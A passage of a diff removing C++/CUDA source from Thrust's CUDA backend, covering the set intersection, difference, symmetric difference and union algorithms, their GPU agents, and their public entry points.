-    Size partition_idx = blockDim.x * blockIdx.x + threadIdx.x;
-    if (partition_idx < num_partitions)
-    {
-      Size partition_at = min<Size>(partition_idx * items_per_tile,
-                                    keys1_count + keys2_count);
-      pair<Size, Size> diag = balanced_path(keys1,
-                                            keys2,
-                                            keys1_count,
-                                            keys2_count,
-                                            partition_at,
-                                            4ll,
-                                            compare_op);
-      partitions[partition_idx] = diag;
-    }
-  }
-}; // struct PartitionAgent
-
-template <class ScanTileState,
-          class Size>
-struct InitAgent
-{
-  template <class Arch>
-  struct PtxPlan : PtxPolicy<128> {};
-
-  typedef core::specialize_plan<PtxPlan> ptx_plan;
-
-  //---------------------------------------------------------------------
-  // Agent entry point
-  //---------------------------------------------------------------------
-
-  THRUST_AGENT_ENTRY(ScanTileState tile_state,
-                     Size          num_tiles,
-                     char * /*shmem*/)
-  {
-    tile_state.InitializeStatus(num_tiles);
-  }
-}; // struct InitAgent
-
-//---------------------------------------------------------------------
-// Serial set operations
-//---------------------------------------------------------------------
-
-// serial_set_intersection
-// -----------------------
-// emit A if A and B are in range and equal.
-struct serial_set_intersection
-{
-  // max_input_size <= 32
-  template <class T, class CompareOp, int ITEMS_PER_THREAD>
-  int THRUST_DEVICE_FUNCTION
-  operator()(T * keys,
-             int keys1_beg,
-             int keys2_beg,
-             int keys1_count,
-             int keys2_count,
-             T (&output)[ITEMS_PER_THREAD],
-             int (&indices)[ITEMS_PER_THREAD],
-             CompareOp compare_op)
-  {
-    int active_mask = 0;
-
-    int aBegin = keys1_beg;
-    int bBegin = keys2_beg;
-    int aEnd   = keys1_beg + keys1_count;
-    int bEnd   = keys2_beg + keys2_count;
-
-    T aKey = keys[aBegin];
-    T bKey = keys[bBegin];
-
-#pragma unroll
-    for (int i = 0; i < ITEMS_PER_THREAD; ++i)
-    {
-      bool pA = compare_op(aKey, bKey);
-      bool pB = compare_op(bKey, aKey);
-
-      // The outputs must come from A by definition of set intersection.
-      output[i]  = aKey;
-      indices[i] = aBegin;
-
-      if ((aBegin < aEnd) && (bBegin < bEnd) && pA == pB)
-        active_mask |= 1 << i;
-
-      if (!pB) { aKey = keys[++aBegin]; }
-      if (!pA) { bKey = keys[++bBegin]; }
-    }
-    return active_mask;
-  }
-}; // struct serial_set_intersection
-
-// serial_set_symmetric_difference
-// -------------------------------
-// emit A if A < B and emit B if B < A.
-struct serial_set_symmetric_difference
-{
-  // max_input_size <= 32
-  template <class T, class CompareOp, int ITEMS_PER_THREAD>
-  int THRUST_DEVICE_FUNCTION
-  operator()(T * keys,
-             int keys1_beg,
-             int keys2_beg,
-             int keys1_count,
-             int keys2_count,
-             T (&output)[ITEMS_PER_THREAD],
-             int (&indices)[ITEMS_PER_THREAD],
-             CompareOp compare_op)
-  {
-    int active_mask = 0;
-
-    int aBegin = keys1_beg;
-    int bBegin = keys2_beg;
-    int aEnd   = keys1_beg + keys1_count;
-    int bEnd   = keys2_beg + keys2_count;
-    int end    = aEnd + bEnd;
-
-    T aKey = keys[aBegin];
-    T bKey = keys[bBegin];
-
-#pragma unroll
-    for (int i = 0; i < ITEMS_PER_THREAD; ++i)
-    {
-      bool pB = aBegin >= aEnd;
-      bool pA = !pB && bBegin >= bEnd;
-
-      if (!pA && !pB)
-      {
-        pA = compare_op(aKey, bKey);
-        pB = !pA && compare_op(bKey, aKey);
-      }
-
-      // The outputs must come from A by definition of set difference.
-      output[i]  = pA ? aKey : bKey;
-      indices[i] = pA ? aBegin : bBegin;
-
-      if (aBegin + bBegin < end && pA != pB)
-        active_mask |= 1 << i;
-
-      if (!pB) { aKey = keys[++aBegin]; }
-      if (!pA) { bKey = keys[++bBegin]; }
-    }
-    return active_mask;
-  }
-}; // struct serial_set_symmetric_difference
-
-// serial_set_difference
-// ---------------------
-// emit A if A < B
-struct serial_set_difference
-{
-  // max_input_size <= 32
-  template <class T, class CompareOp, int ITEMS_PER_THREAD>
-  int THRUST_DEVICE_FUNCTION
-  operator()(T * keys,
-             int keys1_beg,
-             int keys2_beg,
-             int keys1_count,
-             int keys2_count,
-             T (&output)[ITEMS_PER_THREAD],
-             int (&indices)[ITEMS_PER_THREAD],
-             CompareOp compare_op)
-  {
1016 |
-
int active_mask = 0;
|
1017 |
-
|
1018 |
-
int aBegin = keys1_beg;
|
1019 |
-
int bBegin = keys2_beg;
|
1020 |
-
int aEnd = keys1_beg + keys1_count;
|
1021 |
-
int bEnd = keys2_beg + keys2_count;
|
1022 |
-
int end = aEnd + bEnd;
|
1023 |
-
|
1024 |
-
T aKey = keys[aBegin];
|
1025 |
-
T bKey = keys[bBegin];
|
1026 |
-
|
1027 |
-
#pragma unroll
|
1028 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
1029 |
-
{
|
1030 |
-
bool pB = aBegin >= aEnd;
|
1031 |
-
bool pA = !pB && bBegin >= bEnd;
|
1032 |
-
|
1033 |
-
if (!pA && !pB)
|
1034 |
-
{
|
1035 |
-
pA = compare_op(aKey, bKey);
|
1036 |
-
pB = !pA && compare_op(bKey, aKey);
|
1037 |
-
}
|
1038 |
-
|
1039 |
-
// The outputs must come from A by definition of set difference.
|
1040 |
-
output[i] = aKey;
|
1041 |
-
indices[i] = aBegin;
|
1042 |
-
|
1043 |
-
if (aBegin + bBegin < end && pA)
|
1044 |
-
active_mask |= 1 << i;
|
1045 |
-
|
1046 |
-
if (!pB) { aKey = keys[++aBegin]; }
|
1047 |
-
if (!pA) { bKey = keys[++bBegin]; }
|
1048 |
-
}
|
1049 |
-
return active_mask;
|
1050 |
-
}
|
1051 |
-
}; // struct set_difference
|
1052 |
-
|
1053 |
-
// serial_set_union
|
1054 |
-
// ----------------
|
1055 |
-
// emit A if A <= B else emit B
|
1056 |
-
struct serial_set_union
|
1057 |
-
{
|
1058 |
-
// max_input_size <= 32
|
1059 |
-
template <class T, class CompareOp, int ITEMS_PER_THREAD>
|
1060 |
-
int THRUST_DEVICE_FUNCTION
|
1061 |
-
operator()(T * keys,
|
1062 |
-
int keys1_beg,
|
1063 |
-
int keys2_beg,
|
1064 |
-
int keys1_count,
|
1065 |
-
int keys2_count,
|
1066 |
-
T (&output)[ITEMS_PER_THREAD],
|
1067 |
-
int (&indices)[ITEMS_PER_THREAD],
|
1068 |
-
CompareOp compare_op)
|
1069 |
-
{
|
1070 |
-
int active_mask = 0;
|
1071 |
-
|
1072 |
-
int aBegin = keys1_beg;
|
1073 |
-
int bBegin = keys2_beg;
|
1074 |
-
int aEnd = keys1_beg + keys1_count;
|
1075 |
-
int bEnd = keys2_beg + keys2_count;
|
1076 |
-
int end = aEnd + bEnd;
|
1077 |
-
|
1078 |
-
T aKey = keys[aBegin];
|
1079 |
-
T bKey = keys[bBegin];
|
1080 |
-
|
1081 |
-
#pragma unroll
|
1082 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
1083 |
-
{
|
1084 |
-
bool pB = aBegin >= aEnd;
|
1085 |
-
bool pA = !pB && bBegin >= bEnd;
|
1086 |
-
|
1087 |
-
if (!pA && !pB)
|
1088 |
-
{
|
1089 |
-
pA = compare_op(aKey, bKey);
|
1090 |
-
pB = !pA && compare_op(bKey, aKey);
|
1091 |
-
}
|
1092 |
-
|
1093 |
-
// Output A in case of a tie, so check if b < a.
|
1094 |
-
output[i] = pB ? bKey : aKey;
|
1095 |
-
indices[i] = pB ? bBegin : aBegin;
|
1096 |
-
|
1097 |
-
if (aBegin + bBegin < end)
|
1098 |
-
active_mask |= 1 << i;
|
1099 |
-
|
1100 |
-
if (!pB) { aKey = keys[++aBegin]; }
|
1101 |
-
if (!pA) { bKey = keys[++bBegin]; }
|
1102 |
-
|
1103 |
-
}
|
1104 |
-
return active_mask;
|
1105 |
-
}
|
1106 |
-
}; // struct set_union
|
1107 |
-
|
1108 |
-
template <class HAS_VALUES,
|
1109 |
-
class KeysIt1,
|
1110 |
-
class KeysIt2,
|
1111 |
-
class ValuesIt1,
|
1112 |
-
class ValuesIt2,
|
1113 |
-
class Size,
|
1114 |
-
class KeysOutputIt,
|
1115 |
-
class ValuesOutputIt,
|
1116 |
-
class CompareOp,
|
1117 |
-
class SetOp>
|
1118 |
-
cudaError_t THRUST_RUNTIME_FUNCTION
|
1119 |
-
doit_step(void * d_temp_storage,
|
1120 |
-
size_t & temp_storage_size,
|
1121 |
-
KeysIt1 keys1,
|
1122 |
-
KeysIt2 keys2,
|
1123 |
-
ValuesIt1 values1,
|
1124 |
-
ValuesIt2 values2,
|
1125 |
-
Size num_keys1,
|
1126 |
-
Size num_keys2,
|
1127 |
-
KeysOutputIt keys_output,
|
1128 |
-
ValuesOutputIt values_output,
|
1129 |
-
std::size_t * output_count,
|
1130 |
-
CompareOp compare_op,
|
1131 |
-
SetOp set_op,
|
1132 |
-
cudaStream_t stream,
|
1133 |
-
bool debug_sync)
|
1134 |
-
{
|
1135 |
-
Size keys_total = num_keys1 + num_keys2;
|
1136 |
-
if (keys_total == 0)
|
1137 |
-
return cudaErrorNotSupported;
|
1138 |
-
|
1139 |
-
cudaError_t status = cudaSuccess;
|
1140 |
-
|
1141 |
-
using core::AgentPlan;
|
1142 |
-
using core::AgentLauncher;
|
1143 |
-
|
1144 |
-
typedef AgentLauncher<
|
1145 |
-
SetOpAgent<KeysIt1,
|
1146 |
-
KeysIt2,
|
1147 |
-
ValuesIt1,
|
1148 |
-
ValuesIt2,
|
1149 |
-
KeysOutputIt,
|
1150 |
-
ValuesOutputIt,
|
1151 |
-
Size,
|
1152 |
-
CompareOp,
|
1153 |
-
SetOp,
|
1154 |
-
HAS_VALUES> >
|
1155 |
-
set_op_agent;
|
1156 |
-
|
1157 |
-
typedef AgentLauncher<PartitionAgent<KeysIt1, KeysIt2, Size, CompareOp> >
|
1158 |
-
partition_agent;
|
1159 |
-
|
1160 |
-
typedef typename set_op_agent::ScanTileState ScanTileState;
|
1161 |
-
typedef AgentLauncher<InitAgent<ScanTileState, Size> > init_agent;
|
1162 |
-
|
1163 |
-
|
1164 |
-
AgentPlan set_op_plan = set_op_agent::get_plan(stream);
|
1165 |
-
AgentPlan init_plan = init_agent::get_plan();
|
1166 |
-
AgentPlan partition_plan = partition_agent::get_plan();
|
1167 |
-
|
1168 |
-
int tile_size = set_op_plan.items_per_tile;
|
1169 |
-
Size num_tiles = (keys_total + tile_size - 1) / tile_size;
|
1170 |
-
|
1171 |
-
size_t tile_agent_storage;
|
1172 |
-
status = ScanTileState::AllocationSize(num_tiles, tile_agent_storage);
|
1173 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1174 |
-
|
1175 |
-
size_t vshmem_storage = core::vshmem_size(set_op_plan.shared_memory_size,
|
1176 |
-
num_tiles);
|
1177 |
-
size_t partition_agent_storage = (num_tiles + 1) * sizeof(Size) * 2;
|
1178 |
-
|
1179 |
-
void *allocations[3] = {NULL, NULL, NULL};
|
1180 |
-
size_t allocation_sizes[3] = {tile_agent_storage,
|
1181 |
-
partition_agent_storage,
|
1182 |
-
vshmem_storage};
|
1183 |
-
|
1184 |
-
status = core::alias_storage(d_temp_storage,
|
1185 |
-
temp_storage_size,
|
1186 |
-
allocations,
|
1187 |
-
allocation_sizes);
|
1188 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1189 |
-
|
1190 |
-
if (d_temp_storage == NULL)
|
1191 |
-
{
|
1192 |
-
return status;
|
1193 |
-
}
|
1194 |
-
|
1195 |
-
ScanTileState tile_state;
|
1196 |
-
status = tile_state.Init(num_tiles, allocations[0], allocation_sizes[0]);
|
1197 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1198 |
-
|
1199 |
-
pair<Size, Size> *partitions = (pair<Size, Size> *)allocations[1];
|
1200 |
-
char *vshmem_ptr = vshmem_storage > 0 ? (char *)allocations[2] : NULL;
|
1201 |
-
|
1202 |
-
init_agent ia(init_plan, num_tiles, stream, "set_op::init_agent", debug_sync);
|
1203 |
-
ia.launch(tile_state, num_tiles);
|
1204 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1205 |
-
|
1206 |
-
partition_agent pa(partition_plan, num_tiles+1, stream, "set_op::partition agent", debug_sync);
|
1207 |
-
pa.launch(keys1,
|
1208 |
-
keys2,
|
1209 |
-
num_keys1,
|
1210 |
-
num_keys2,
|
1211 |
-
num_tiles+1,
|
1212 |
-
partitions,
|
1213 |
-
compare_op,
|
1214 |
-
tile_size);
|
1215 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1216 |
-
|
1217 |
-
set_op_agent sa(set_op_plan, keys_total, stream, vshmem_ptr, "set_op::set_op_agent", debug_sync);
|
1218 |
-
sa.launch(keys1,
|
1219 |
-
keys2,
|
1220 |
-
values1,
|
1221 |
-
values2,
|
1222 |
-
num_keys1,
|
1223 |
-
num_keys2,
|
1224 |
-
keys_output,
|
1225 |
-
values_output,
|
1226 |
-
compare_op,
|
1227 |
-
set_op,
|
1228 |
-
partitions,
|
1229 |
-
output_count,
|
1230 |
-
tile_state);
|
1231 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1232 |
-
|
1233 |
-
return status;
|
1234 |
-
}

template <typename HAS_VALUES,
          typename Derived,
          typename KeysIt1,
          typename KeysIt2,
          typename ValuesIt1,
          typename ValuesIt2,
          typename KeysOutputIt,
          typename ValuesOutputIt,
          typename CompareOp,
          typename SetOp>
THRUST_RUNTIME_FUNCTION
pair<KeysOutputIt, ValuesOutputIt>
set_operations(execution_policy<Derived>& policy,
               KeysIt1                    keys1_first,
               KeysIt1                    keys1_last,
               KeysIt2                    keys2_first,
               KeysIt2                    keys2_last,
               ValuesIt1                  values1_first,
               ValuesIt2                  values2_first,
               KeysOutputIt               keys_output,
               ValuesOutputIt             values_output,
               CompareOp                  compare_op,
               SetOp                      set_op)
{
  typedef typename iterator_traits<KeysIt1>::difference_type size_type;

  size_type num_keys1 = static_cast<size_type>(thrust::distance(keys1_first, keys1_last));
  size_type num_keys2 = static_cast<size_type>(thrust::distance(keys2_first, keys2_last));

  if (num_keys1 + num_keys2 == 0)
    return thrust::make_pair(keys_output, values_output);

  size_t       temp_storage_bytes = 0;
  cudaStream_t stream             = cuda_cub::stream(policy);
  bool         debug_sync         = THRUST_DEBUG_SYNC_FLAG;

  cudaError_t status;
  THRUST_DOUBLE_INDEX_TYPE_DISPATCH(status, doit_step<HAS_VALUES>,
      num_keys1, num_keys2, (NULL,
                             temp_storage_bytes,
                             keys1_first,
                             keys2_first,
                             values1_first,
                             values2_first,
                             num_keys1_fixed,
                             num_keys2_fixed,
                             keys_output,
                             values_output,
                             reinterpret_cast<std::size_t*>(NULL),
                             compare_op,
                             set_op,
                             stream,
                             debug_sync));
  cuda_cub::throw_on_error(status, "set_operations failed on 1st step");

  size_t allocation_sizes[2] = {sizeof(std::size_t), temp_storage_bytes};
  void * allocations[2]      = {NULL, NULL};

  size_t storage_size = 0;

  status = core::alias_storage(NULL,
                               storage_size,
                               allocations,
                               allocation_sizes);
  cuda_cub::throw_on_error(status, "set_operations failed on 1st alias_storage");

  // Allocate temporary storage.
  thrust::detail::temporary_array<thrust::detail::uint8_t, Derived>
    tmp(policy, storage_size);
  void *ptr = static_cast<void*>(tmp.data().get());

  status = core::alias_storage(ptr,
                               storage_size,
                               allocations,
                               allocation_sizes);
  cuda_cub::throw_on_error(status, "set_operations failed on 2nd alias_storage");

  std::size_t* d_output_count
    = thrust::detail::aligned_reinterpret_cast<std::size_t*>(allocations[0]);

  THRUST_DOUBLE_INDEX_TYPE_DISPATCH(status, doit_step<HAS_VALUES>,
      num_keys1, num_keys2, (allocations[1],
                             temp_storage_bytes,
                             keys1_first,
                             keys2_first,
                             values1_first,
                             values2_first,
                             num_keys1_fixed,
                             num_keys2_fixed,
                             keys_output,
                             values_output,
                             d_output_count,
                             compare_op,
                             set_op,
                             stream,
                             debug_sync));
  cuda_cub::throw_on_error(status, "set_operations failed on 2nd step");

  status = cuda_cub::synchronize(policy);
  cuda_cub::throw_on_error(status, "set_operations failed to synchronize");

  std::size_t output_count = cuda_cub::get_value(policy, d_output_count);

  return thrust::make_pair(keys_output + output_count, values_output + output_count);
}
}    // namespace __set_operations

//-------------------------
// Thrust API entry points
//-------------------------

__thrust_exec_check_disable__
template <class Derived,
          class ItemsIt1,
          class ItemsIt2,
          class OutputIt,
          class CompareOp>
OutputIt __host__ __device__
set_difference(execution_policy<Derived> &policy,
               ItemsIt1                   items1_first,
               ItemsIt1                   items1_last,
               ItemsIt2                   items2_first,
               ItemsIt2                   items2_last,
               OutputIt                   result,
               CompareOp                  compare)
{
  OutputIt ret = result;
  if (__THRUST_HAS_CUDART__)
  {
    typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
    ret = __set_operations::set_operations<thrust::detail::false_type>(
        policy,
        items1_first,
        items1_last,
        items2_first,
        items2_last,
        null_,
        null_,
        result,
        null_,
        compare,
        __set_operations::serial_set_difference())
        .first;
  }
  else
  {
#if !__THRUST_HAS_CUDART__
    ret = thrust::set_difference(cvt_to_seq(derived_cast(policy)),
                                 items1_first,
                                 items1_last,
                                 items2_first,
                                 items2_last,
                                 result,
                                 compare);
#endif
  }
  return ret;
}

template <class Derived,
          class ItemsIt1,
          class ItemsIt2,
          class OutputIt>
OutputIt __host__ __device__
set_difference(execution_policy<Derived> &policy,
               ItemsIt1                   items1_first,
               ItemsIt1                   items1_last,
               ItemsIt2                   items2_first,
               ItemsIt2                   items2_last,
               OutputIt                   result)
{
  typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
  return cuda_cub::set_difference(policy,
                                  items1_first,
                                  items1_last,
                                  items2_first,
                                  items2_last,
                                  result,
                                  less<value_type>());
}
|
1417 |
-
|
1418 |
-
/*****************************/
|
1419 |
-
|
1420 |
-
|
1421 |
-
__thrust_exec_check_disable__
|
1422 |
-
template <class Derived,
|
1423 |
-
class ItemsIt1,
|
1424 |
-
class ItemsIt2,
|
1425 |
-
class OutputIt,
|
1426 |
-
class CompareOp>
|
1427 |
-
OutputIt __host__ __device__
|
1428 |
-
set_intersection(execution_policy<Derived> &policy,
|
1429 |
-
ItemsIt1 items1_first,
|
1430 |
-
ItemsIt1 items1_last,
|
1431 |
-
ItemsIt2 items2_first,
|
1432 |
-
ItemsIt2 items2_last,
|
1433 |
-
OutputIt result,
|
1434 |
-
CompareOp compare)
|
1435 |
-
{
|
1436 |
-
OutputIt ret = result;
|
1437 |
-
if (__THRUST_HAS_CUDART__)
|
1438 |
-
{
|
1439 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1440 |
-
//
|
1441 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1442 |
-
policy,
|
1443 |
-
items1_first,
|
1444 |
-
items1_last,
|
1445 |
-
items2_first,
|
1446 |
-
items2_last,
|
1447 |
-
null_,
|
1448 |
-
null_,
|
1449 |
-
result,
|
1450 |
-
null_,
|
1451 |
-
compare,
|
1452 |
-
__set_operations::serial_set_intersection())
|
1453 |
-
.first;
|
1454 |
-
}
|
1455 |
-
else
|
1456 |
-
{
|
1457 |
-
#if !__THRUST_HAS_CUDART__
|
1458 |
-
ret = thrust::set_intersection(cvt_to_seq(derived_cast(policy)),
|
1459 |
-
items1_first,
|
1460 |
-
items1_last,
|
1461 |
-
items2_first,
|
1462 |
-
items2_last,
|
1463 |
-
result,
|
1464 |
-
compare);
|
1465 |
-
#endif
|
1466 |
-
}
|
1467 |
-
return ret;
|
1468 |
-
}
|
1469 |
-
|
1470 |
-
template <class Derived,
|
1471 |
-
class ItemsIt1,
|
1472 |
-
class ItemsIt2,
|
1473 |
-
class OutputIt>
|
1474 |
-
OutputIt __host__ __device__
|
1475 |
-
set_intersection(execution_policy<Derived> &policy,
|
1476 |
-
ItemsIt1 items1_first,
|
1477 |
-
ItemsIt1 items1_last,
|
1478 |
-
ItemsIt2 items2_first,
|
1479 |
-
ItemsIt2 items2_last,
|
1480 |
-
OutputIt result)
|
1481 |
-
{
|
1482 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1483 |
-
return cuda_cub::set_intersection(policy,
|
1484 |
-
items1_first,
|
1485 |
-
items1_last,
|
1486 |
-
items2_first,
|
1487 |
-
items2_last,
|
1488 |
-
result,
|
1489 |
-
less<value_type>());
|
1490 |
-
}
|
1491 |
-
|
1492 |
-
|
1493 |
-
/*****************************/
|
1494 |
-
|
1495 |
-
__thrust_exec_check_disable__
|
1496 |
-
template <class Derived,
|
1497 |
-
class ItemsIt1,
|
1498 |
-
class ItemsIt2,
|
1499 |
-
class OutputIt,
|
1500 |
-
class CompareOp>
|
1501 |
-
OutputIt __host__ __device__
|
1502 |
-
set_symmetric_difference(execution_policy<Derived> &policy,
|
1503 |
-
ItemsIt1 items1_first,
|
1504 |
-
ItemsIt1 items1_last,
|
1505 |
-
ItemsIt2 items2_first,
|
1506 |
-
ItemsIt2 items2_last,
|
1507 |
-
OutputIt result,
|
1508 |
-
CompareOp compare)
|
1509 |
-
{
|
1510 |
-
OutputIt ret = result;
|
1511 |
-
if (__THRUST_HAS_CUDART__)
|
1512 |
-
{
|
1513 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1514 |
-
//
|
1515 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1516 |
-
policy,
|
1517 |
-
items1_first,
|
1518 |
-
items1_last,
|
1519 |
-
items2_first,
|
1520 |
-
items2_last,
|
1521 |
-
null_,
|
1522 |
-
null_,
|
1523 |
-
result,
|
1524 |
-
null_,
|
1525 |
-
compare,
|
1526 |
-
__set_operations::serial_set_symmetric_difference())
|
1527 |
-
.first;
|
1528 |
-
}
|
1529 |
-
else
|
1530 |
-
{
|
1531 |
-
#if !__THRUST_HAS_CUDART__
|
1532 |
-
ret = thrust::set_symmetric_difference(cvt_to_seq(derived_cast(policy)),
|
1533 |
-
items1_first,
|
1534 |
-
items1_last,
|
1535 |
-
items2_first,
|
1536 |
-
items2_last,
|
1537 |
-
result,
|
1538 |
-
compare);
|
1539 |
-
#endif
|
1540 |
-
}
|
1541 |
-
return ret;
|
1542 |
-
}
|
1543 |
-
|
1544 |
-
|
1545 |
-
template <class Derived,
|
1546 |
-
class ItemsIt1,
|
1547 |
-
class ItemsIt2,
|
1548 |
-
class OutputIt>
|
1549 |
-
OutputIt __host__ __device__
|
1550 |
-
set_symmetric_difference(execution_policy<Derived> &policy,
|
1551 |
-
ItemsIt1 items1_first,
|
1552 |
-
ItemsIt1 items1_last,
|
1553 |
-
ItemsIt2 items2_first,
|
1554 |
-
ItemsIt2 items2_last,
|
1555 |
-
OutputIt result)
|
1556 |
-
{
|
1557 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1558 |
-
return cuda_cub::set_symmetric_difference(policy,
|
1559 |
-
items1_first,
|
1560 |
-
items1_last,
|
1561 |
-
items2_first,
|
1562 |
-
items2_last,
|
1563 |
-
result,
|
1564 |
-
less<value_type>());
|
1565 |
-
}
|
1566 |
-
|
1567 |
-
/*****************************/
|
1568 |
-
|
1569 |
-
__thrust_exec_check_disable__
|
1570 |
-
template <class Derived,
|
1571 |
-
class ItemsIt1,
|
1572 |
-
class ItemsIt2,
|
1573 |
-
class OutputIt,
|
1574 |
-
class CompareOp>
|
1575 |
-
OutputIt __host__ __device__
|
1576 |
-
set_union(execution_policy<Derived> &policy,
|
1577 |
-
ItemsIt1 items1_first,
|
1578 |
-
ItemsIt1 items1_last,
|
1579 |
-
ItemsIt2 items2_first,
|
1580 |
-
ItemsIt2 items2_last,
|
1581 |
-
OutputIt result,
|
1582 |
-
CompareOp compare)
|
1583 |
-
{
|
1584 |
-
OutputIt ret = result;
|
1585 |
-
if (__THRUST_HAS_CUDART__)
|
1586 |
-
{
|
1587 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1588 |
-
//
|
1589 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1590 |
-
policy,
|
1591 |
-
items1_first,
|
1592 |
-
items1_last,
|
1593 |
-
items2_first,
|
1594 |
-
items2_last,
|
1595 |
-
null_,
|
1596 |
-
null_,
|
1597 |
-
result,
|
1598 |
-
null_,
|
1599 |
-
compare,
|
1600 |
-
__set_operations::serial_set_union())
|
1601 |
-
.first;
|
1602 |
-
}
|
1603 |
-
else
|
1604 |
-
{
|
1605 |
-
#if !__THRUST_HAS_CUDART__
|
1606 |
-
ret = thrust::set_union(cvt_to_seq(derived_cast(policy)),
|
1607 |
-
items1_first,
|
1608 |
-
items1_last,
|
1609 |
-
items2_first,
|
1610 |
-
items2_last,
|
1611 |
-
result,
|
1612 |
-
compare);
|
1613 |
-
#endif
|
1614 |
-
}
|
1615 |
-
return ret;
|
1616 |
-
}
|
1617 |
-
|
1618 |
-
|
1619 |
-
template <class Derived,
|
1620 |
-
class ItemsIt1,
|
1621 |
-
class ItemsIt2,
|
1622 |
-
class OutputIt>
|
1623 |
-
OutputIt __host__ __device__
|
1624 |
-
set_union(execution_policy<Derived> &policy,
|
1625 |
-
ItemsIt1 items1_first,
|
1626 |
-
ItemsIt1 items1_last,
|
1627 |
-
ItemsIt2 items2_first,
|
1628 |
-
ItemsIt2 items2_last,
|
1629 |
-
OutputIt result)
|
1630 |
-
{
|
1631 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1632 |
-
return cuda_cub::set_union(policy,
|
1633 |
-
items1_first,
|
1634 |
-
items1_last,
|
1635 |
-
items2_first,
|
1636 |
-
items2_last,
|
1637 |
-
result,
|
1638 |
-
less<value_type>());
|
1639 |
-
}
|
1640 |
-
|
1641 |
-
|
1642 |
-
/*****************************/
|
1643 |
-
/*****************************/
|
1644 |
-
/***** *_by_key *****/
|
1645 |
-
/*****************************/
|
1646 |
-
/*****************************/
|
1647 |
-
|
1648 |
-
/*****************************/
|
1649 |
-
|
1650 |
-
__thrust_exec_check_disable__
|
1651 |
-
template <class Derived,
|
1652 |
-
class KeysIt1,
|
1653 |
-
class KeysIt2,
|
1654 |
-
class ItemsIt1,
|
1655 |
-
class ItemsIt2,
|
1656 |
-
class KeysOutputIt,
|
1657 |
-
class ItemsOutputIt,
|
1658 |
-
class CompareOp>
|
1659 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1660 |
-
set_difference_by_key(execution_policy<Derived> &policy,
|
1661 |
-
KeysIt1 keys1_first,
|
1662 |
-
KeysIt1 keys1_last,
|
1663 |
-
KeysIt2 keys2_first,
|
1664 |
-
KeysIt2 keys2_last,
|
1665 |
-
ItemsIt1 items1_first,
|
1666 |
-
ItemsIt2 items2_first,
|
1667 |
-
KeysOutputIt keys_result,
|
1668 |
-
ItemsOutputIt items_result,
|
1669 |
-
CompareOp compare_op)
|
1670 |
-
{
|
1671 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1672 |
-
if (__THRUST_HAS_CUDART__)
|
1673 |
-
{
|
1674 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1675 |
-
policy,
|
1676 |
-
keys1_first,
|
1677 |
-
keys1_last,
|
1678 |
-
keys2_first,
|
1679 |
-
keys2_last,
|
1680 |
-
items1_first,
|
1681 |
-
items2_first,
|
1682 |
-
keys_result,
|
1683 |
-
items_result,
|
1684 |
-
compare_op,
|
1685 |
-
__set_operations::serial_set_difference());
|
1686 |
-
}
|
1687 |
-
else
|
1688 |
-
{
|
1689 |
-
#if !__THRUST_HAS_CUDART__
|
1690 |
-
ret = thrust::set_difference_by_key(cvt_to_seq(derived_cast(policy)),
|
1691 |
-
keys1_first,
|
1692 |
-
keys1_last,
|
1693 |
-
keys2_first,
|
1694 |
-
keys2_last,
|
1695 |
-
items1_first,
|
1696 |
-
items2_first,
|
1697 |
-
keys_result,
|
1698 |
-
items_result,
|
1699 |
-
compare_op);
|
1700 |
-
#endif
|
1701 |
-
}
|
1702 |
-
return ret;
|
1703 |
-
}
|
1704 |
-
|
1705 |
-
template <class Derived,
|
1706 |
-
class KeysIt1,
|
1707 |
-
class KeysIt2,
|
1708 |
-
class ItemsIt1,
|
1709 |
-
class ItemsIt2,
|
1710 |
-
class KeysOutputIt,
|
1711 |
-
class ItemsOutputIt>
|
1712 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1713 |
-
set_difference_by_key(execution_policy<Derived> &policy,
|
1714 |
-
KeysIt1 keys1_first,
|
1715 |
-
KeysIt1 keys1_last,
|
1716 |
-
KeysIt2 keys2_first,
|
1717 |
-
KeysIt2 keys2_last,
|
1718 |
-
ItemsIt1 items1_first,
|
1719 |
-
ItemsIt2 items2_first,
|
1720 |
-
KeysOutputIt keys_result,
|
1721 |
-
ItemsOutputIt items_result)
|
1722 |
-
{
|
1723 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1724 |
-
return cuda_cub::set_difference_by_key(policy,
|
1725 |
-
keys1_first,
|
1726 |
-
keys1_last,
|
1727 |
-
keys2_first,
|
1728 |
-
keys2_last,
|
1729 |
-
items1_first,
|
1730 |
-
items2_first,
|
1731 |
-
keys_result,
|
1732 |
-
items_result,
|
1733 |
-
less<value_type>());
|
1734 |
-
}
|
1735 |
-
|
1736 |
-
/*****************************/
|
1737 |
-
|
1738 |
-
__thrust_exec_check_disable__
|
1739 |
-
template <class Derived,
|
1740 |
-
class KeysIt1,
|
1741 |
-
class KeysIt2,
|
1742 |
-
class ItemsIt1,
|
1743 |
-
class ItemsIt2,
|
1744 |
-
class KeysOutputIt,
|
1745 |
-
class ItemsOutputIt,
|
1746 |
-
class CompareOp>
|
1747 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1748 |
-
set_intersection_by_key(execution_policy<Derived> &policy,
|
